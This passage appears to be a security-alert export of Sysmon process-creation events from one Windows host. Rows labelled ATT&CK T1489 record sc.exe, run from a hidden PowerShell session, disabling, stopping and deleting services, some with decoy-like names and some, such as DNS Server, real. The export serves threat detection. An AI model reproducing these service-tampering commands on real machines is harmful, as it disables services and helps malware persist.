{df9fc3d3-b3d4-5ecf-0000-001069912b00} +ProcessId: 5664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHasdadelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHasdadelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.720243500Z"",""eventRecordID"":""3275"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.717\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001069912b00}\r\nProcessId: 5664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHasdadelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.717"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-001069912b00}"",""processId"":""5664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHasdadelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.016",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.684 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010688f2b00} +ProcessId: 3548 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.687294600Z"",""eventRecordID"":""3273"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.684\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010688f2b00}\r\nProcessId: 3548\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.684"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010688f2b00}"",""processId"":""3548"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.946",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.630 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010438c2b00} +ProcessId: 7876 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.632625800Z"",""eventRecordID"":""3270"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.630\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010438c2b00}\r\nProcessId: 7876\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.630"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010438c2b00}"",""processId"":""7876"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.903",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.531 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001003892b00} +ProcessId: 2356 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.540864400Z"",""eventRecordID"":""3268"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.531\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001003892b00}\r\nProcessId: 2356\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.531"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-001003892b00}"",""processId"":""2356"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.880",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.505 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00103a882b00} +ProcessId: 6332 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.512800400Z"",""eventRecordID"":""3267"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.505\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00103a882b00}\r\nProcessId: 6332\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.505"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-00103a882b00}"",""processId"":""6332"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.085",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.311 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010f9842b00} +ProcessId: 736 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.315513600Z"",""eventRecordID"":""3264"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.311\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010f9842b00}\r\nProcessId: 736\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.311"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010f9842b00}"",""processId"":""736"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.022",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.189 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010be812b00} +ProcessId: 7840 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 